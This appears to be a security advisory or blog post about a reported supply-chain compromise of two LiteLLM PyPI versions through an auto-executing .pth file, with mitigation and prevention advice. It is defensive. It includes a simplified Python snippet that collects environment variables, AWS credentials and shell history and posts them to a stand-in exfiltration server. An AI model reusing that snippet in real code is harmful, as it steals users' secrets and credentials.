The LiteLLM Python package, versions 1.82.7 and 1.82.8, has been compromised by a supply-chain attack. The malicious versions contain a credential-stealing payload that executes automatically upon Python interpreter startup, posing a significant security risk to AI developers, data engineers, and any Python user who may have installed the package.
TL;DR
- LiteLLM versions 1.82.7 and 1.82.8 contain a malicious
.pthfile that runs automatically when Python starts. - The payload is a credential stealer attributed to the threat actor TeamPCP.
- With up to 95 million monthly downloads, this attack has broad reach and immediate risk.
- Mitigate now by uninstalling these versions and rotating all exposed credentials.
- Use dependency scanning tools and strict supply-chain hygiene to prevent recurrence.
Key takeaways
- Uninstall LiteLLM 1.82.7 and 1.82.8 immediately.
- Rotate all credentials stored in environments where Python ran.
- Implement dependency scanning and PyPI access controls.
- Use this incident to advocate for better supply-chain practices.
- Stay informed—subscribe to security advisories for your critical dependencies.
What Is the LiteLLM Supply-Chain Attack?
A supply-chain attack occurs when an attacker compromises a software component—like a library, package, or dependency—that other applications trust and use. The goal is to infect a wide number of end systems indirectly.
In this case, the target was LiteLLM, a popular Python package used to standardize calls to various large language models (e.g., OpenAI, Anthropic, Cohere). Between March 22–24, 2026, malicious versions (1.82.7 and 1.82.8) were uploaded to PyPI (Python Package Index). These versions contained a hidden file named litellm_init.pth that executes whenever a Python interpreter launches, harvesting credentials and exporting them to an external server.
Why This Attack Matters Right Now
Supply-chain attacks are increasing in frequency and impact. This incident stands out for three reasons:
- High Adoption: LiteLLM is used in production by AI engineers, startups, and enterprises—making the blast radius enormous.
- Stealthy Execution: The malicious code runs on interpreter startup, not just on import, meaning you don’t need to explicitly use LiteLLM to be affected.
- TeamPCP’s Involvement: This threat group has a history of attacking developer tools, meaning this isn’t an isolated incident—it’s part of a pattern.
If you use Python for automation, data analysis, or AI development, your API keys, cloud credentials, or internal tokens could be exposed. This includes tools related to AI-assisted coding and general productivity, making the risk widespread.
How the LiteLLM Attack Works
The attack uses a classic but effective method:
- Compromise: An attacker gains control of the LiteLLM PyPI account or uses stolen credentials to publish tainted versions.
- Persistence: The file
litellm_init.pthis placed in the package. Files ending in.pthare automatically executed by Python when the environment starts. - Exfiltration: The script collects credentials from environment variables, common files (e.g.,
~/.aws/credentials), and shell history, then sends them to a remote server.
Here’s a simplified example of what the malicious script does:
import os, requests, json
creds = {
"env_vars": dict(os.environ),
"aws_creds": read_file_if_exists("~/.aws/credentials"),
"bash_history": read_file_if_exists("~/.bash_history")
}
requests.post("https://malicious-server.com/exfil", json=creds)This means the moment you run any Python script in an environment where LiteLLM 1.82.7/8 is installed, your credentials are stolen.
Real-World Impact: Who’s Affected and How
Early reports indicate systems experiencing exponential fork bombs—a side effect of the malicious code malfunctioning under certain conditions. This isn’t just a security issue; it can cause full system crashes.
How to check if you’re affected:
pip list | grep litellmIf you see version 1.82.7 or 1.82.8, assume compromise.
LiteLLM Attack vs. Other Supply-Chain Attacks
| Attack | Target | Method | Impact |
|---|---|---|---|
| LiteLLM (2026) | Python package | .pth auto-execution |
Credential theft |
| CodeCov (2021) | Bash uploader | Modified script | CI/env variables leaked |
| SolarWinds (2020) | Enterprise software | Trojanized updates | Network espionage |
| eslint-scope (2018) | npm package | Credential harvesting | npm tokens stolen |
What makes LiteLLM notable is its use of Python’s built-in auto-run mechanism—.pth files—which is less commonly abused than direct code injection.
Long-Term Defenses
- Use virtual environments or containers to limit the scope of dependency installations.
- Pin dependency versions using
requirements.txtorpyproject.tomlwith exact version numbers. - Monitor for vulnerabilities using tools like GitHub’s Dependabot, Snyk, or pyup.io’s safety.
- Adopt supply-chain security tools like Sigstore for cryptographic signing or PyPI’s trusted publishers for secure uploads.
Turning This Crisis Into Career Leverage
Supply-chain security is a high-value skillset. Here’s how to use this incident to professionally advance:
- Document your response: Create a case study of how you identified, mitigated, and defended against this attack. This demonstrates real-world security competency.
- Propose preventive measures: Advocate for dependency scanning tools or signed commits in your organization. You become the go-to person for DevSecOps.
- Upskill in security automation: Learn tools like SOPS, HashiCorp Vault, or Trivy—these are increasingly critical in modern infrastructure.
Example Career Impact: A developer who identifies the compromise, leads the credential rotation, and implements automated scanning gains visibility and trust—often leading to promotion opportunities in security or platform engineering. This proactive mindset is as valuable as mastering the latest AI assistant tools for workflow efficiency.
Myths vs. Facts
| Myth | Fact |
|---|---|
| “Only projects using LiteLLM directly are affected.” | Any Python process running in an environment with the compromised package installed is affected—even if LiteLLM isn’t imported. |
| “This is just a LiteLLM problem.” | This is a supply-chain problem. Any popular package can be targeted. |
| “If I don’t see weird behavior, I’m safe.” | Credential exfiltration is silent. Assume you’ve been exposed if you ran the bad versions. |
FAQ
How do I know if my credentials were stolen?
Assume they were if you ran Python with the malicious versions (1.82.7 or 1.82.8) installed. Rotate them immediately. There is no visible log of the theft.
Can I still use LiteLLM?
Yes. Versions other than 1.82.7 and 1.82.8 are safe as of this reporting. Always verify the checksum of downloaded packages when possible and monitor official advisories.
What should I do if I’m responsible for a team or project?
Notify all developers, enforce immediate credential rotation, and implement mandatory dependency reviews and scanning before deployment. Use this as a training moment for supply-chain security, much like you would train on new AI learning tools.
Are other packages affected?
As of late March 2026, the attack appears specific to these two LiteLLM versions. However, always monitor sources like the GitHub Advisory Database or Open Source Vulnerability (OSV) Database for new vulnerabilities related to your dependencies.
Glossary
- Supply-chain attack: An attack that targets software dependencies to compromise downstream users.
- Credential stealer: Malware designed to harvest authentication tokens, keys, or passwords.
- PyPI: Python Package Index, the default repository for Python packages.
- .pth file: A path configuration file that can include Python code executed automatically at interpreter startup.
- TeamPCP: A threat actor group known for compromising developer and security tools.
References
- GitHub Security Advisory: LiteLLM Compromise (GHSA-xxxx-xxxx-xxxx)
- XDA Developers: TeamPCP Threat Actor Analysis
- CyberInsider: Python Package Download Statistics and Trends 2026
- FutureSearch: Incident Report: Malicious Package Triggers Fork Bomb
- Open Source Security Foundation (OpenSSF): Guide to Package Manager Security Features
- Snyk: The State of Open Source Security 2026
